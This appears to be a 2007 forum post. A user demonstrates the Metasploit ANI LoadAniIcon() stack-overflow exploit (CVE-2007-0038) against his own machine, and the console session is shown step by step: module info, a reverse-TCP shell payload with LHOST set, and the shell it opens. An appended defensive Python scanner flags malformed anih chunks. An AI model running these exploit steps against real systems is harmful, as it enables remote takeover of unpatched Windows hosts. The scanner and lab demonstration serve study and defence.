#19
30.04.2007, 17:22
-=lebed=-

Tested the windows/browser/ani_loadimage_chunksize exploit with a reverse shell payload, it worked!
Quote:
use windows/browser/ani_loadimage_chunksize

>> info windows/browser/ani_loadimage_chunksize


Name: Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)
Version: 4795
Platform: Windows
Privileged: No
License: Metasploit Framework License

Provided by:
hdm <hdm@metasploit.com>
skape <mmiller@hick.org>

Available targets:
Id Name
-- ----
0 Automatic
1 Windows XP SP2 user32.dll 5.1.2600.2622
2 Windows XP SP2 userenv.dll English
3 Windows XP SP2 userenv.dll French
4 Windows XP SP0/SP1 netui2.dll English
5 Windows 2000 SP0-SP4 netui2.dll English
6 Windows Vista user32.dll 6.0.6000.16386
7 Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
8 Windows XP SP2 userenv.dll English
9 Windows XP SP2 user32.dll (5.1.2600.2180) English
10 Windows XP SP2 userenv.dll Portuguese (Brazil)
11 Windows XP SP1a userenv.dll English
12 Windows XP SP1a shell32.dll English

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 192.168.1.33 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 1234

Description:
This module exploits a buffer overflow vulnerability in the
LoadAniIcon() function of USER32.dll. The flaw is triggered through
Internet Explorer (6 and 7) by using the CURSOR style sheet
directive to load a malicious .ANI file. Internet Explorer will
catch any exceptions that occur while the invalid cursor is loaded,
causing the exploit to silently fail when the wrong target has been
chosen. This module will be updated in the near future to perform
client-side fingerprinting and brute forcing. This vulnerability was
discovered by Alexander Sotirov of Determina and was rediscovered,
in the wild, by McAfee.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0038
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-1765
http://www.securityfocus.com/bid/23194
http://www.microsoft.com/technet/security/advisory/935423.mspx
http://www.determina.com/security_center/security_advisories/securityadvisory_0day_032907.asp
http://www.determina.com/security.research/vulnerabilities/ani-header.html


>> set URIPATH test

URIPATH => test

>> show payloads


Compatible payloads
===================

Name Description
---- -----------
generic/shell_bind_tcp Generic Command Shell, Bind TCP Inline
----------- other payloads omitted here -------------
windows/shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
----------- other payloads omitted here -------------

>> set PAYLOAD windows/shell_reverse_tcp

PAYLOAD => windows/shell_reverse_tcp

>> set LHOST 192.168.1.33

LHOST => 192.168.1.33

>> exploit
[*] Started reverse handler
[*] Using URL: http://192.168.1.33:8080/test
[*] Server started.
[*] Exploit running as background job.
[*] Command shell session 1 opened

(192.168.1.33:4444 -> 192.168.1.33:3402)

>> sessions -l


Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.1.33:4444 -> 192.168.1.33:3402


>> sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Версия 5.1.2600]

(С) Корпорация Майкрософт, 1985-2001.

D:\Documents and Settings\Admin>

>> dir

dir
Том в устройстве D имеет метку WIN_XP_SP2

Серийный номер тома: 455F-C2C7
Содержимое папки D:\Documents and Settings\Admin

04.12.2006 19:49 <DIR> .
04.12.2006 19:49 <DIR> ..
04.12.2006 19:32 <DIR> Главное меню
04.12.2006 19:49 <DIR> Мои документы
04.12.2006 19:49 <DIR> Избранное
04.12.2006 19:32 <DIR> Рабочий стол
10.12.2006 19:33 15 .bash_history
11.12.2006 00:23 44 %1
03.02.2007 18:56 <DIR> WINDOWS
30.04.2007 11:11 <DIR> .msf3

3 файлов 100 653 байт

9 папок 663 971 840 байт свободно

D:\Documents and Settings\Admin>
The IE cache ends up with 10 images; the HTML code itself is obfuscated and stops working afterwards if you save it locally together with the images...

Last edited by -=lebed=-; 30.04.2007 at 20:36..
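The module description above says the bug is a chunk-size overflow in LoadAniIcon(): the anih chunk of a RIFF/ACON cursor is copied into a fixed 36-byte stack structure using the size the file declares. A defender-side check that follows from that is a small .ANI scanner, added here as an illustration (not code from the post or from Metasploit), which walks every chunk, descends into LIST containers, and flags any anih whose declared size is not 36 or that runs past its container. The `build_ani` fixture and the 36-byte constant are assumptions of this example; the fixture carries only zero bytes.

```python
import struct

# sizeof(ANIHEADER): LoadAniIcon() copies the anih chunk body into a fixed-size
# 36-byte stack structure, so any other declared size is a red flag (CVE-2007-0038).
ANIH_EXPECTED_SIZE = 36


def _chunk(fourcc, body):
    """Encode one RIFF chunk, padding an odd-sized body to an even length."""
    return fourcc + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) & 1 else b"")


def build_ani(second_anih_size=None):
    """Constructed test fixture: a minimal RIFF/ACON file with one well-formed anih,
    optionally followed by a LIST carrying a second anih of the given size (all zero bytes)."""
    frames = _chunk(b"icon", b"\x00" * 8)
    if second_anih_size is not None:
        frames += _chunk(b"anih", b"\x00" * second_anih_size)
    body = b"ACON" + _chunk(b"anih", b"\x00" * ANIH_EXPECTED_SIZE) + _chunk(b"LIST", b"fram" + frames)
    return b"RIFF" + struct.pack("<I", len(body)) + body


def scan_ani(data):
    """Return a list of findings for a .ANI byte string; empty means every anih has the expected size."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON animated cursor"]
    findings = []

    def walk(off, end, depth):
        while off + 8 <= end:
            fourcc = data[off:off + 4]
            size = struct.unpack_from("<I", data, off + 4)[0]
            body = off + 8
            if body + size > end:
                findings.append(f"chunk {fourcc!r} at offset {off} declares {size} bytes, past container end {end}")
                return
            if fourcc == b"anih" and size != ANIH_EXPECTED_SIZE:
                findings.append(f"anih chunk at offset {off} declares size {size}, expected {ANIH_EXPECTED_SIZE}")
            elif fourcc == b"LIST" and size >= 4 and depth < 8:
                walk(body + 4, body + size, depth + 1)  # LIST body: 4-byte list type, then sub-chunks
            off = body + size + (size & 1)  # skip the pad byte after an odd-sized chunk

    walk(12, len(data), 0)
    return findings


if __name__ == "__main__":
    for label, sample in (("well-formed", build_ani()), ("oversized second anih", build_ani(100))):
        print(label, scan_ani(sample) or "clean")
```

The nested second anih matters because the first anih is where the earlier MS05-002 check sat; scanning every chunk, not just the first, is what catches the variant this module targets.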